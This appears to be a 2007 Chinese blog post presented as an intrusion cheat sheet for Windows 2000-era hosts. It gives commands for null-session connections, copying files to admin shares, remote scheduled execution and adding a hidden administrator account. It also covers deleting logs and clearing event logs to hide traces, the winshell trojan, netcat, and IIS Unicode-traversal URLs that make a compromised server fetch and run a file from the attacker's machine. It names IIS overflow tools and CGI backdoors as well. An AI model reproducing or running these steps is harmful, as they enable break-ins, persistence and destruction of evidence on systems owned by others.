網管和駭客都必須知道的命令

youhello發表於2007-12-24
與遠端主機建立空管連線 net use IP地址ipc$ "" /use:""
  以管理員身份登入遠端主機 net use IP地址ipc$ "密碼" /use:"Administrator"
  傳送檔案到遠端主機WINNT目錄下copy 本機目錄路徑程式 IP地址admin$
  檢視遠端主機時間 net time IP地址
  定時啟動某個程式 at IP地址 02:18 readme.exe
  檢視共享 net view IP地址
  檢視netbios工作組列表 nBTstat -A IP地址
  將遠端主機C盤對映為自己的F盤 net use f: IP地址c$ ""/user:"Administrator"
  這兩條把自己增加到管理員組: net user 使用者名稱 密碼 /add
  net locaLGroup Administrators 使用者名稱 /add
  斷開連線 net use IP地址ipc$ /delete

  掃尾:
  del C:winntsystem32logfiles*.*
  del C:winntssytem32config*.evt
  del C:winntsystem32dTCLog*.*
  del C:winntsystem32*.log
  del C:winntsystem32*.txt
  del C:winnt*.txt
  del C:winnt*.log[@more@]一、netsvc.exe
  下面的命令分別是列出主機上的服務專案、查尋和遠端啟動主機的“時間任務”服務:
  netsvc /list IP地址
  netsvc schedule IP地址 /query
  netsvc IP地址 schedule /start

二、OpenTelnet.exe
  遠端啟動主機的Telnet服務,並繫結埠到7878,例如:
  OpenTelnet IP地址 使用者名稱 密碼 1 7878
  然後就可以telnet到主機的7878埠,進入DOS方式下:
  telnet IP地址 7878

三、winshell.exe
  一個非常小的木馬(不到6K),telnet到主機的7878埠,輸入密碼winshell,當看到CMD>後,可打下面的命令:
  p Path (檢視winshell主程式的路徑資訊)
  b reBoot (重新啟動機器)
  d shutDown (關閉機器)
  s Shell (執行後你就會看到可愛的“C:>”)
  x eXit (退出本次登入會話,此命令並不終止winshell的執行)
  CMD> (透過http下載其他網站上的檔案到執行winshell的機器上)

四、3389登陸器,GUI方式登入遠端主機的

五、elsave.exe
  事件日誌清除工具
  elsave -s IP地址 -l "application" -C
  elsave -s IP地址 -l "system" -C
  elsave -s IP地址 -l "security" -C
  執行後成功清除應用程式日誌,系統日誌,安全日誌
六、hbulot.exe
  開啟win2kserver和winxp的3389服務
  hbulot (/r)

七、nc.exe(netcat.exe)
  一個很好的工具,一些指令碼程式都要用到它,也可做溢位後的連線用。
  想要連線到某處: nc (-options) hostname port(s)(ports) ...
  繫結埠等待連線: nc -l -p port (-options) (hostname) (port)

引數:
  -e prog 程式重定向,一旦連線,就執行 (危險!)
  -g gateway source-routing hop point(s), up to 8
  -G num source-routing pointer: 4, 8, 12, ...
  -h 幫助資訊
  -i secs 延時的間隔
  -l 監聽模式,用於入站連線
  -n 指定數字的IP地址,不能用hostname
  -o file 記錄16進位制的傳輸
  -p port 本地埠號
  -r 任意指定本地及遠端埠
  -s addr 本地源地址
  -u UDP模式
  -v 詳細輸出——用兩個-v可得到更詳細的內容
  -w secs timeout的時間
  -z 將輸入輸出關掉——用於掃描時

八、TFTPD32.EXE
  把自己的電腦臨時變為一臺FTP伺服器,讓肉雞來下載檔案,tftp命令要在肉雞上執行,通常要利用Unicode漏洞或telnet到肉雞,例如:
  地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機IP地址 get 檔名 c:winntsystem32檔名
  然後可以直接令檔案執行:
  地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+檔名

九、prihack.exe是IIS的printer遠端緩衝區溢位工具
  idqover.exe是溢位idq的,選擇“溢位後在一個埠監聽”,然後用telnet連線它的監聽埠,如果溢位成功,一連它的埠,繫結的命令馬上執行。xploit.exe是一個圖形介面的ida溢位,成功以後winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行許可權的目錄。然後用IE瀏覽器連線.

來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/79126/viewspace-995606/,如需轉載,請註明出處,否則將追究法律責任。

相關文章